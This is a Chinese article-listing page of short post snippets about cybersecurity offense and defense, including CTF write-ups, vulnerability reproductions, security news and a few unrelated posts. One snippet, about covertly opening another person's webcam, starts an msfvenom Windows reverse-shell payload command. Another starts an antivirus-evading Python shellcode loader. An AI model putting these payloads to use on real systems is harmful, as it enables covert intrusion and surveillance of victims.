免杀攻防

CTF--攻防世界-杂项入门第一课

这是第一次接触杂项这个方向,所以就是根据writeup解的题,没有什么自己的思路,只是写一篇文章来记录一下解题过程。下载题目后拿到一张图片,确实挺迷惑的,不知从何下手,根据大家的思路都是看看有没有隐写,这里就需要用到一个很好用的工具--StegSolve这里就穿插一下这个工具的下载以及安装http://www.caesum.com/handbook/Stegsolve.jar这个下载链接,这是一个
丞星星祺气球·2023-09-23 17:20

攻防世界 Web Writeup Part1 <简单部分>

攻防世界Web进阶部分题解FlatScience通过这题学到一些SQLite的语法,wget的应用robots.txt找到两个隐藏文件。
Arklight·2023-09-23 14:55

新手攻防:Web

1.view_source得到网址,来到网页。ctrl+u看源代码那个绿色的应该是吧。然后我先试了数字,接着加上flag。。。。都不行T_T!打开评论。。。cyberpeace{baba0ee174ebcf59ddd0a5c6a71cf8f8}就是。欸,不知道格式啊。2.robots啥都不会。。由评论区得在网址后面输入:/robots.txt发现隐藏文件f1ag_1s_h3re.php地址栏中输入
江东弟弟·2023-09-23 14:06

高级身份威胁检测系统可检测拦截攻防演练漏洞

近期将迎来大型攻防演练活动。随着各种实战攻防演练活动和红队(攻击队)利用0-Day及N-Day漏洞频繁攻击,甲方的蓝队(防守队)会出现应接不暇。
WuThreat·2023-09-23 11:17

【漏洞复现-jupyter_notebook-命令执行】vulfocus/jupyter_notebook-cve_2019_9644

殊荣:CSDN网络安全领域优质创作者,2022年双十一业务安全保卫战-某厂第一名,某厂特邀数字业务安全研究员,edusrc高白帽,vulfocus、攻防世界等平台排名100+、高校漏洞证书、cnvd原创漏洞证书等
黑色地带(崛起)·2023-09-22 09:50

【漏洞复现-maccms-命令执行】vulfocus/maccms-cve_2017_17733

殊荣:CSDN网络安全领域优质创作者,2022年双十一业务安全保卫战-某厂第一名,某厂特邀数字业务安全研究员,edusrc高白帽,vulfocus、攻防世界等平台排名100+、高校漏洞证书、cnvd原创漏洞证书等
黑色地带(崛起)·2023-09-22 09:20

【漏洞复现-seaCms-命令执行】vulfocus/seacms-cnvd_2020_22721

殊荣:CSDN网络安全领域优质创作者,2022年双十一业务安全保卫战-某厂第一名,某厂特邀数字业务安全研究员,edusrc高白帽,vulfocus、攻防世界等平台排名100+、高校漏洞证书、cnvd原创漏洞证书等
黑色地带(崛起)·2023-09-22 09:20

【漏洞复现-solr-命令执行】vulfocus/solr-cve_2019_17558

殊荣:CSDN网络安全领域优质创作者,2022年双十一业务安全保卫战-某厂第一名,某厂特邀数字业务安全研究员,edusrc高白帽,vulfocus、攻防世界等平台排名100+、高校漏洞证书、cnvd原创漏洞证书等
黑色地带(崛起)·2023-09-22 09:20

【漏洞复现-thinkphp-命令执行】vulfocus/thinkphp-3.2.x

殊荣:CSDN网络安全领域优质创作者,2022年双十一业务安全保卫战-某厂第一名,某厂特邀数字业务安全研究员,edusrc高白帽,vulfocus、攻防世界等平台排名100+、高校漏洞证书、cnvd原创漏洞证书等
黑色地带(崛起)·2023-09-22 09:50

【漏洞复现-webmin-命令执行】vulfocus/webmin-cve_2019_15107

殊荣:CSDN网络安全领域优质创作者,2022年双十一业务安全保卫战-某厂第一名,某厂特邀数字业务安全研究员,edusrc高白帽,vulfocus、攻防世界等平台排名100+、高校漏洞证书、cnvd原创漏洞证书等
黑色地带(崛起)·2023-09-22 09:50

【漏洞复现-discuz-wooyun-命令执行】vulfocus/discuz-wooyun_2010_080723

殊荣:CSDN网络安全领域优质创作者,2022年双十一业务安全保卫战-某厂第一名,某厂特邀数字业务安全研究员,edusrc高白帽,vulfocus、攻防世界等平台排名100+、高校漏洞证书、cnvd原创漏洞证书等
黑色地带(崛起)·2023-09-22 09:49

【漏洞复现-thinkphp-代码执行】vulfocus/thinkphp-cve_2018_1002015

殊荣:CSDN网络安全领域优质创作者,2022年双十一业务安全保卫战-某厂第一名,某厂特邀数字业务安全研究员,edusrc高白帽,vulfocus、攻防世界等平台排名100+、高校漏洞证书、cnvd原创漏洞证书等
黑色地带(崛起)·2023-09-22 09:49

安全厂商中睿天下加入龙蜥社区

中睿天下成立于2014年,是以“实战对抗”为特点的能力价值型网络安全厂商,一直以“保证国家网络空间安全”为使命,依托自身国家级网络攻防对抗能力,构建面向实战对抗的新一代高级安全防护体系,围绕数据中心网、
OpenAnolis小助手·2023-09-21 21:36

黑客攻防技术宝典-Web实战篇——第三章、Web应用程序技术(编码方案)

第三章、Web应用程序技术(编码方案)书接上回不同的编码方案的研发是为了安全处理数据。但是许多情况下,攻击者可以控制编码方案,造成开发者无法预料的行为。URL编码URL中只允许使用US-ASCII码的可打印字符(0x20-0x7e)。ASCAII可打印字符图来自https://blog.csdn.net/qq_38769551/article/details/101459811由于在URL或者HT
wwwneymar·2023-09-21 09:51

山石发声 | 做好安全运营,没有你想象的那么难

攻击侧升级,攻防不对等?人才缺口大,维护成本高?山石网科安全运营体系让安全运营挑战迎刃而解近年来,全球安全服务市场景气度较高,行业增速远高于安全行业的整体水平。
山石网科·2023-09-21 07:01

攻防世界-WEB-fileinclude

访问url,可以看到一些提示,绝对路径/var/www/html/index.php,也提示了flag在flag.php中。快捷键Ctrl+u,查看网页源代码思路:源代码中看到`@include($lan.".php");`,可知此处存在文件包含。`$lan`的值是从cookie中传过来的。所以对`language`赋值,构造payload,重放包就可读出flag.php经过base64加密后字符
Lucifer_wei·2023-09-20 22:47

渗透测试之信息收集

攻防之间的任何较量,都是基于对信息的掌握程度,在信息不对称的情况下,很容易造成误判或失误。信息收集被认为是安全产业团队测试中「最重要、最耗时」
刘正2001·2023-09-20 22:11

网络安全(黑客技术)学习笔记

3.所需要的技术水平需要掌握的知识点偏多(举例):外围打点能力渗透漏洞挖掘流量分析代码审计逆向免杀4.国家政策环境对于国家与企业的地位愈发重要,没有网络安全就没有国
德西德西·2023-09-20 11:47

詹姆斯加时赛有点累,湖人该注意了,施罗德缺阵还是有影响?

最近几场比赛,要收比赛的关键时候,詹姆斯在攻防两端都没有了季后赛那样的爆发力!詹姆斯本赛季的综合实力没有下降,反而是湖人的角色球员相比上赛季已经出现了下滑。湖人队不仅仅是戴维斯和施罗德没有上场造成现在
投篮技术剖析·2023-09-20 09:07

木马免杀之PE文件

对于此问题,打算开一个专题进行木马免杀的分析,先从最最重要的PE文件说起,要攻击Windows系统,如果不懂PE文件,面对杀毒软件,则只能束手就擒了。PE文件PE(PortableExec
无情剑客Burning·2023-09-20 03:40

安全狗亮相厦门市第五届网络安全宣传周开幕式

据悉,此次主要包含领导致辞、厦门市第五届网络安全宣传周亮点活动介绍、厦门市第二届网络安全攻防演练优秀组织奖颁奖、厦门市委网信办网络安全优秀技术支撑单位颁奖、2023“网信柏鹭杯”大学生网络空间安全精英赛启动仪式
安全狗新闻·2023-09-19 22:21

深入web攻防策略

前言互联网时代,数据安全与个人隐私信息等受到极大的威胁和挑战,本文将以几种常见的攻击以及防御方法展开分析。1、XSS(跨站脚本攻击)定义:通过存在安全漏洞的Web网站注册用户的浏览器内运行非法的HTML标签或JavaScript进行的一种攻击可造成的主要影响:利用虚假输入表单骗取用户个人信息。利用脚本窃取用户的Cookie值,被害者在不知情的情况下,帮助攻击者发送恶意请求。原理:恶意攻击者往Web
HarkAllen·2023-09-19 18:09

攻防世界题目练习——Web难度1(二)

题目目录1.fileinclude2.fileclude3.easyphp4.file_include5.unseping1.fileinclude一道文件包含题,对文件包含还是不太懂,直接看flag.php文件什么都没有。根据WriteUp提示先f12查看源码,发现了文件包含的漏洞点lan.php文件,如图:$lan的值来自cookie中的language值,并且注意,include中有".ph
什么都没学会·2023-09-19 16:45

攻防世界题目练习——Misc杂项难度1(一)

题目目录1.Banmabanma2.适合作为桌面第一次接触这种类型的题,解题全靠WriteUp1.Banmabanma用到在线扫描工具inlite在线工具题目就是一张图片,斑马图案看起来是条形码,因此用扫码工具扫描。flag{TENSHINE}2.适合作为桌面看WriteUp写过程:)使用工具:stegsolve图片隐写解析器的使用用stegsolve打开文件之后,点击下面的箭头,两边都能点,应该
什么都没学会·2023-09-19 16:45

打开对方的电脑的摄像头

大家玩玩就好,有杀毒软件可能会被干掉,关于免杀方式有很多,请勿捉弄同学,谢谢msfvenom-pwindows/meterpreter/reverse_tcpLHOST=10.0.128.149LPORT
落幕_f94c·2023-09-19 14:39

行为式验证码小侃,滑块验证码详解

但是随着技术不断的发展,尤其是图像识别技术,曾今机器无法解决的问题,一个一个被攻克,所以验证码技术在攻防
Aldwin_NG·2023-09-19 09:08

Windows多种方式获取密码

后面一段时间直到hw结束,我打算把主要精力都放在免杀上面,不会点C真的寸步难行,或者就只能从go下手了0x01SSP记录明文密码SSP(SecuritySupportProvider)是一个用于实现身份验证的
book4yi·2023-09-19 08:11

网工内推 | 网络安全工程师,上市公司,13薪,食宿有补贴

负责客户网络安全攻击入侵事件溯源分析、处置等工作;2、根据攻击告警/入侵事件,进行取证调查,攻击溯源反制;3、根据取证样本/攻击特性进行病毒木马分析、漏洞分析/挖掘等工作,制定优化策略并指导实施;4、从攻防角度
HCIE考证研究所·2023-09-19 03:15

馥郁芬芳。

忍者修道,主要研究奇门遁甲,除了大家都知道的幻术(利用视觉误差、精神控制、药物控制造成被施术者感觉、意志、精神出错)之外,在用毒方面的攻防也是重要的必修课。不少忍者对蛇毒都有非常深入的研究。
helloKimmy·2023-09-19 02:23

【Mo&AI TIME 人工智能技术博客】矛与盾的对决——神经网络后门攻防

2022年7月9日,AITIME组织了Ph.D.Debate第十一期,题为“矛与盾的对决——神经网络后门攻防”的研讨活动,特别邀请了宾夕法尼亚州州立大学电子工程系博士生向臻、清华大学博士生李一鸣、弗吉尼亚理工计算机工程博士生曾祎和普渡大学计算机科学博士生沈广宇作为
Momodel平台·2023-09-18 22:58

海南神州希望:提升代码审计服务品质,成就客户数字化安全发展

海南神州希望积极参与国家等级保护建设,肩负着技术研究、攻防对抗、运维保障的重要使命,为国家网络安全事业持续健康发展不断贡献力量。
开源网安·2023-09-18 15:32

网络安全攻防对抗之隐藏通信隧道技术整理

完成内网信息收集工作后,渗透测试人员需要判断流量是否出得去、进得来。隐藏通信隧道技术常用于在访问受限的网络环境中追踪数据流向和在非受信任的网络中实现安全的数据传输。一、隐藏通信隧道基础知识(一)隐藏通信隧道概述一般的网络通信,先在两台机器之间建立TCP连接,然后进行正常的数据通信。在知道IP地址的情况下,可以直接发送报文;如果不知道IP地址,就需要将域名解析成IP地址。在实际的网络种,通常会通过各
見贤思齊·2023-09-18 10:09

学习黑客需要先了解哪些知识,零基础怎样掌握网络安全知识体系

未知攻,焉知防,攻防兼备,是为网安之道。本文就给大家讲讲普通人如何通过系统性的学习,掌握网络安全体系的内容。大家要排除关于黑客认知的几个误区。
耿直学编程·2023-09-18 07:53

攻防世界之PHP2(web进阶)

考点:url编码解码思路:1、打开界面,发现什么也没有。2、扫描后台,发现两个页面:index.phpindex.php23、index.php中无内容。index.phps中看到提示4、阅读代码,意思是传入参数id的值不能“===”admin,但是url解码后的值“==”admin。5、因为浏览器会自动将url进行一次解码,所以这里我们需要二次加密。admin-->%61dmin(将a进行了加密
0。0;·2023-09-18 02:36

攻防世界之simple_php(web简单)

题目:小宁听说php是最好的语言,于是她简单学习之后写了几行php代码打开后看到几行php代码:1234){//b>1234echo$flag2;//输出第2部分flag}?>所以说,这里我们要找一个值,即==0,又为真。由于php为弱语言,他的“==”仅表示数值相等,而且当数字和字母组成的字符串与数字进行比较时,仅会以最前面的数字参与比较。所以我们编写一个变量a=0asdf,即a=0加上一串字
0。0;·2023-09-18 02:35

免杀对抗-Python-混淆算法+反序列化-打包生成器-Pyinstall

Python-MSF/CS生成shellcode-上线cs上线1.生成shellcode-c或者python2.打开pycharm工具,创建一个py文件,将原生态执行代码复制进去shellcode执行代码:importctypesfromdjango.contrib.gisimportptr#cs#shellcode=bytearray(b"生成的shellcode")#msf的shellcode
xiaoheizi安全·2023-09-18 00:25

2021-03-25 推荐六场世预赛:西班牙VS希腊,双方实力悬殊 西班牙取胜无难度

特别是进攻端,在去年的欧国联赛事中累计打进13球且只丢2球,攻防两端表现出色。球队还擅长主场作战,上一次主场输球还是在2018年。希腊希腊最近一场赛事在去年的欧国联中主场0-0战平
足球精彩时刻·2023-09-17 22:40

php ASP 攻防环境搭建

一,PHP网站搭建简介:PHP网站基于windows2003搭建,内存占用较小,运行速度较快。这里采用phpstudy进行一键搭建,也可以用宝塔进行搭建,用phpstudy相对简单,快捷,方便,支持的插件多。Phpstudy里面包含了apache+php和nginx+phpl和IIS三种建站基础环境,方便一键安装,操作简单二,环境准备1,用phpstudy搭建bwapp、dvwa、pikachu、
爱笑的三月姑娘·2023-09-17 15:50

ART 在 Android 安全攻防中的应用

在日常的Android应用安全分析中,经常会遇到一些对抗,比如目标应用加壳、混淆、加固,需要进行脱壳还原;又或者会有针对常用注入工具的检测,比如frida、Xposed等,这时候也会想知道这些工具的核心原理以及是否自己可以实现。其实这些问题的答案就在Android的Java虚拟机实现中。可以是早期的Dalvik虚拟机,也可以是最新的ART虚拟机。从时代潮流来看,本文主要专注于ART。不过,为了铭记
有价值炮灰·2023-09-17 14:11

最新Union注入攻击及代码分析技术

点击星标,即时接收最新推文本文选自《web安全攻防渗透测试实战指南(第2版)》点击图片五折购书Union注入攻击Union注入攻击的测试地址在本书第2章。访问该网址时,页面返回的结果如图4-12所示。
Ms08067安全实验室·2023-09-17 01:31

最新Boolean注入攻击和代码分析技术

点击星标,即时接收最新推文本文选自《web安全攻防渗透测试实战指南(第2版)》点击图片五折购书Boolean注入攻击Boolean注入攻击的测试地址在本书第2章。
Ms08067安全实验室·2023-09-17 01:58

2022年勒索软件呈现三大趋势

同时事实证明,经历了几年的攻防演进,勒索软件攻击不仅没有减少,反而变本加厉,攻击事件层出不穷。可以预见,2022年勒索软件攻击事件还将显著增长,攻击者的数量也将达到空前的程度。
网品天下·2023-09-16 20:30

PowerShell脚本免杀/bypass/绕过杀毒软件,ReconFTW 漏洞扫描

PowerShell脚本免杀/bypass/绕过杀毒软件,ReconFTW漏洞扫描。
代码讲故事·2023-09-16 18:17

零基础小白如何自学黑客(网络安全)?

黑客攻防是一个极具魅力的技术领域,但成为一名黑客毫无疑问也并不容易。你必须拥有对新技术的好奇心和积极的学习态度,具备很深的计算机系统、编程语言和操作系统知识,并乐意不断地去学习和
Jinmindong·2023-09-16 17:07

我的夏日

天空的眼神有毒如利刃划伤行者的皮肤路上不是水泥就是沥青一脚一个鞋印热熔的不知是地面还鞋底大树底下上演攻防战热风一次次围攻进来凉快险胜之后越来越微弱夜的黑袍也挡不住炎热的狂躁竹席吸收了它的能量将摊开的脂肪烤的滋滋响渴望睡眠的梦里有一湖可见不可及的清凉
余燕霞·2023-09-16 11:37

Web安全与攻防

Web安全概述在Internet大众化及Web技术飞速演变的今天,在线安全所面临的挑战日益严峻。伴随着在线信息和服务的可用性的提升,以及基于Web的攻击和破坏的增长,安全风险达到了前所未有的高度。Web安全可以从以下三个方面进行考虑:Web服务器的安全、Web客户端的安全、Web通信信道的安全。针对Web服务器的攻击可以分为两类:一是利用Web服务器的漏洞进行攻击,如IIS缓冲区溢出漏洞利用、目录
爱编程的鱼·2023-09-16 10:44

网络安全实战对抗中的观察与思考

在本次攻防演练的过程中,绿盟科技M-SEC社区监测并确认了上百个漏洞在被积极利用,其中0day和1day漏洞的数量较往年有所提升,但nday漏洞依然是主力。
疯狂创作者·2023-09-16 02:29

持安科技孙维伯:零信任理念下的实战攻防:ISC2023数字小镇演讲

近日,在ISC2023第十一届互联网安全大会上,持安科技联合创始人孙维伯作为零信任办公安全赛道代表,亮相数字小镇New50,并发表《全方位防御:零信任理念下的实战攻防》主题演讲。
持安科技·2023-09-16 00:11

【送书活动】畅销书《Kali Linux高级渗透测试》更新版速速查收~

近年来,网络安全攻防对抗演练发挥了越来越重要的作用。企业的安全管理者通过组织内部或外部攻击队,站在恶意攻击者的视角,识别自身网络安全建设
想你依然心痛·2023-09-15 23:15

攻防最前线:Oracle数据库勒索病毒RushQL死灰复燃

360安全公司处置过程:Oracle数据库勒索病毒RushQL死灰复燃其他处置方式:https://blog.csdn.net/weixin_38467835/article/details/105261839查询数据库创建时间又多少天了,这个病毒大于1200天才会执行SELECTNVL(TO_CHAR(SYSDATE-MIN(LAST_ANALYZED)),0)FROMALL_TABLESWHE
承诺一时的华丽·2023-09-15 08:26
上一页 22 23 24 25 26 27 28 29 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他